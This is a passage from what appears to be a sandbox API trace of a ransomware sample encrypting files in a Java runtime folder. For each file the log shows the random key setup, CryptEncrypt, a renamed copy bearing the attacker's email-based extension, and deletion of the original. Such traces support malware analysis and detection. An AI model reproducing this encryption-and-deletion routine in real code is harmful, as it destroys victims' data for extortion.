pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.930] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.930] CryptDestroyKey (hKey=0xac3070) returned 1 [0151.930] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.930] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0151.930] CloseHandle (hObject=0x2f8) returned 1 [0151.930] CloseHandle (hObject=0x308) returned 1 [0151.930] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe")) returned 1 [0151.931] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.931] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16448) returned 1 [0151.931] CloseHandle (hObject=0x308) returned 1 [0151.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe")) returned 0x20 [0151.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.932] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.932] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.932] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2e70) returned 1 [0151.932] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.932] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4040, lpOverlapped=0x0) returned 1 [0151.934] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050) returned 1 [0151.934] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4050, lpOverlapped=0x0) returned 1 [0151.935] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2fb0) returned 1 [0151.935] CryptSetKeyParam (hKey=0xac2fb0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.935] CryptEncrypt (in: hKey=0xac2fb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.935] CryptDestroyKey (hKey=0xac2fb0) returned 1 [0151.935] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.936] CryptDestroyKey (hKey=0xac2e70) returned 1 [0151.936] CloseHandle (hObject=0x308) returned 1 [0151.936] CloseHandle (hObject=0x2f8) returned 1 [0151.936] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe")) returned 1 [0151.937] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.938] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=233536) returned 1 [0151.938] CloseHandle (hObject=0x2f8) returned 1 [0151.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll")) returned 0x20 [0151.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.938] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.938] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.939] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2df0) returned 1 [0151.939] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.939] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x39040, lpOverlapped=0x0) returned 1 [0151.944] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x39050, dwBufLen=0x39050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x39050) returned 1 [0151.944] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x39050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x39050, lpOverlapped=0x0) returned 1 [0151.948] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2f30) returned 1 [0151.948] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.948] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.948] CryptDestroyKey (hKey=0xac2f30) returned 1 [0151.948] WriteFile (in: hFile=0x308, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.948] CryptDestroyKey (hKey=0xac2df0) returned 1 [0151.948] CloseHandle (hObject=0x2f8) returned 1 [0151.948] CloseHandle (hObject=0x308) returned 1 [0151.949] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\lcms.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\lcms.dll")) returned 1 [0151.951] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0151.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.951] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=36928) returned 1 [0151.951] CloseHandle (hObject=0x308) returned 1 [0151.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll")) returned 0x20 [0151.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0151.951] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.952] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0151.952] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.952] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2ff0) returned 1 [0151.952] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.952] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x9040, lpOverlapped=0x0) returned 1 [0151.954] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x9050, dwBufLen=0x9050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x9050) returned 1 [0151.954] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x9050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x9050, lpOverlapped=0x0) returned 1 [0151.955] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3170) returned 1 [0151.955] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0151.955] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0151.955] CryptDestroyKey (hKey=0xac3170) returned 1 [0151.955] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0151.955] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0151.956] CloseHandle (hObject=0x308) returned 1 [0151.956] CloseHandle (hObject=0x2f8) returned 1 [0151.956] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll")) returned 1 [0152.055] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0152.073] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=829264) returned 1 [0152.075] CloseHandle (hObject=0x308) returned 1 [0152.076] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll")) returned 0x20 [0152.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.086] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0152.099] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.105] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.109] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0152.109] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3430) returned 1 [0152.110] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.110] ReadFile (in: hFile=0x2ec, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xca750, lpOverlapped=0x0) returned 1 [0152.126] CryptEncrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xca760, dwBufLen=0xca760 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xca760) returned 1 [0152.128] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xca760, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xca760, lpOverlapped=0x0) returned 1 [0152.142] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2eb0) returned 1 [0152.142] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.142] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0152.142] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0152.142] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0152.142] CryptDestroyKey (hKey=0xac3430) returned 1 [0152.142] CloseHandle (hObject=0x2ec) returned 1 [0152.142] CloseHandle (hObject=0x2e0) returned 1 [0152.142] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll")) returned 1 [0152.191] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.191] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0152.192] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=96832) returned 1 [0152.192] CloseHandle (hObject=0x2e0) returned 1 [0152.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll")) returned 0x20 [0152.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0152.192] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.192] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.193] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0152.193] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2df0) returned 1 [0152.193] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.193] ReadFile (in: hFile=0x2e0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x17a40, lpOverlapped=0x0) returned 1 [0152.196] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x17a50, dwBufLen=0x17a50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x17a50) returned 1 [0152.196] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x17a50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x17a50, lpOverlapped=0x0) returned 1 [0152.198] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2e70) returned 1 [0152.198] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.198] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30, dwBufLen=0x30 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30) returned 1 [0152.198] CryptDestroyKey (hKey=0xac2e70) returned 1 [0152.198] WriteFile (in: hFile=0x2ec, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xe2, lpOverlapped=0x0) returned 1 [0152.198] CryptDestroyKey (hKey=0xac2df0) returned 1 [0152.198] CloseHandle (hObject=0x2e0) returned 1 [0152.198] CloseHandle (hObject=0x2ec) returned 1 [0152.199] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\net.dll")) returned 1 [0152.200] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0152.200] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=60480) returned 1 [0152.200] CloseHandle (hObject=0x2ec) returned 1 [0152.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll")) returned 0x20 [0152.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0152.201] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.201] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\nio.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\nio.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0152.201] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3070) returned 1 [0152.201] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.201] ReadFile (in: hFile=0x2ec, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xec40, lpOverlapped=0x0) returned 1 [0152.203] 